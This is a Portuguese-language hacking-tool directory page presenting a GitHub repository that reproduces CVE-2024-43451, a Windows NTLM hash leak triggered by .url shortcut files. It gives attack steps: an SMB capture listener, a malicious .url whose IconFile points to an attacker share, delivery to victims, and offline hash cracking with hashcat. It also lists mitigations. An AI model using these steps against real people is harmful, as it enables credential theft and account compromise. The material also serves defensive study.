Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction
Quebra de SenhasFerramentas de PhishingReconhecimentoAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesAprendizado e EducaçãoLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction

cve-2024-43451-ntlm_hash_disclosure_reproduction

Reprodução de CVE: cve-2024-43451-ntlm_hash_disclosure_reproduction

Ver Repositório
22há 2 mesesAinda não revisado

CVE-2024-43451 — Vulnerabilidade de Spoofing de Divulgação de Hash NTLM do Windows

Visão Geral

A CVE-2024-43451 é uma vulnerabilidade de spoofing de divulgação de hash NTLMv2 no Windows. Ela permite que um atacante remoto não autenticado vaze o hash NTLM de uma vítima ao convencê-la a interagir com um arquivo de atalho .url malicioso. A vulnerabilidade é acionada com interação mínima do usuário — bastar clicar com o botão direito, excluir ou mover o arquivo para vazar o hash. Ela possui pontuação CVSS de 6.5 (Média) e tem sido explorada ativamente na natureza. A CISA a adicionou ao catálogo de Vulnerabilidades Conhecidas Exploradas (KEV).

Detalhes Técnicos

Autenticação NTLM

NTLM (NT LAN Manager) é um protocolo de autenticação de desafio-resposta usado pelo Windows. Quando um cliente tenta acessar um recurso via SMB, o cliente e o servidor realizam um handshake:

  1. O cliente envia uma NEGOTIATE_MESSAGE contendo as capacidades suportadas.
  2. O servidor responde com uma CHALLENGE_MESSAGE contendo um nonce de 8 bytes (desafio do servidor).
  3. O cliente responde com uma AUTHENTICATE_MESSAGE contendo o hash NTLMv2 — um HMAC-MD5 do desafio combinado com o hash da senha do usuário, nome de usuário e domínio.

Se um atacante puder observar ou disparar uma tentativa de autenticação NTLM para uma máquina que ele controla, a AUTHENTICATE_MESSAGE capturada pode ser quebrada offline para recuperar a senha em texto puro.

Formato de Arquivo .url

Um arquivo .url é um arquivo de atalho usado pelo Internet Explorer e pelo Windows Explorer para armazenar links. É um arquivo formatado em INI com uma seção [InternetShortcut]. Os campos críticos para exploração são:

  • URL= — a URL de destino que o Windows abrirá.
  • IconFile= — um caminho UNC opcional para um recurso de ícone. Quando o Windows Explorer renderiza o arquivo, ele tenta automaticamente recuperar o ícone do compartilhamento remoto, disparando uma tentativa de autenticação NTLM para o servidor do atacante.

Vetor de Ataque

O atacante cria um arquivo .url com um parâmetro IconFile apontando para \\attacker-ip\share\icon.ico. Quando a vítima:

  • Clica com o botão direito no arquivo (o Windows Explorer busca o ícone para o menu de contexto),
  • Move ou copia o arquivo (o ícone é relido), ou
  • Exclui o arquivo (o ícone é buscado para o diálogo da lixeira),

O Windows Explorer tenta carregar o ícone do caminho UNC, enviando o hash NTLMv2 da vítima para o listener SMB do atacante (ex.: Responder).

Versões Afetadas

Todas as versões suportadas do Windows anteriores à atualização de Patch Tuesday de novembro de 2024:

  • Windows 10 (todas as versões)
  • Windows 11
  • Windows Server 2016 / 2019 / 2022 / 2025
  • Windows Server 2008 / 2012 R2
  • Versões antigas sem suporte também são provavelmente vulneráveis, mas não receberão patches.

Configuração da Exploração

Requisitos

  • Máquina do atacante: Linux ou Windows com uma ferramenta de captura SMB (ex.: Responder, smbserver do Impacket ou Inveigh).
  • Máquina da vítima: Qualquer sistema Windows sem patch.
  • Acesso à rede: A vítima deve conseguir alcançar o IP do atacante na porta 445 (SMB).

Ferramentas

FerramentaDescrição
ResponderEnvenenador LLMNR/NBT-NS/mDNS com servidor SMB integrado para captura de hashes
Impacketsmbserver.py pode ser usado para hospedar um compartilhamento SMB simples
InveighFerramenta de captura NTLM baseada em PowerShell para Windows

Etapas de Reprodução

1. Inicie o listener SMB (máquina do atacante)

Usando o Responder:

sudo responder -I eth0 -v

Ou usando o Impacket:

sudo impacket-smbserver share . -smb2support

2. Gere o arquivo .url malicioso

python exploit.py --ip 192.168.1.100 --output malicious.url

3. Entregue o arquivo à vítima

  • Anexo de e-mail, pendrive USB, compartilhamento de arquivos ou download pela web.

4. Interação da vítima

Qualquer uma das seguintes ações dispara o vazamento do hash:

  • Clique com o botão direito → o ícone é buscado para o menu de contexto → handshake NTLM enviado ao atacante
  • Excluir → o ícone é buscado para o diálogo de confirmação
  • Mover/Copiar → o ícone é relido do caminho UNC
  • Simplesmente visualizar a pasta no modo Detalhes ou Ícones (carregamento do ícone)

5. Capture o hash

O listener SMB do atacante recebe um hash NTLMv2:

[SMB] NTLMv2-SSP Hash     : victim::DOMAIN:1122334455667788:0123456789abcdef0123456789abcdef:010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

6. Quebre o hash (offline)

hashcat -m 5600 captured.txt /usr/share/wordlists/rockyou.txt

Prova de Conceito

# See exploit.py in this repository for a full PoC implementation.
# The script generates a .url file with IconFile set to:
#   \\192.168.1.100\share\icon.ico
# and optionally a custom display icon via IconIndex.

Mitigação

MitigaçãoDescrição
Aplicar o patch de novembro de 2024Instalar a atualização de segurança da Microsoft de KB5044285
Bloquear SMB de saída (porta 445)Impedir que hashes NTLM deixem o perímetro da rede
Desabilitar NTLM quando possívelUsar autenticação somente Kerberos
Habilitar assinatura SMBImpede ataques de relay mesmo se os hashes forem capturados
Treinamento de conscientização do usuárioEducar os usuários a não interagir com arquivos .url inesperados
Restringir o manuseio de arquivos .urlUsar Política de Grupo para bloquear a execução ou o envio de arquivos .url por e-mail

Referências

  • Microsoft Security Response Center — CVE-2024-43451
  • Catálogo de Vulnerabilidades Conhecidas Exploradas da CISA
  • NVD — CVE-2024-43451
  • Responder — GitHub
  • Impacket — GitHub
  • The Hacker News — ataques direcionados à Ucrânia
  • Análise da campanha UAC-0194 / SparkRAT
Baixar ferramenta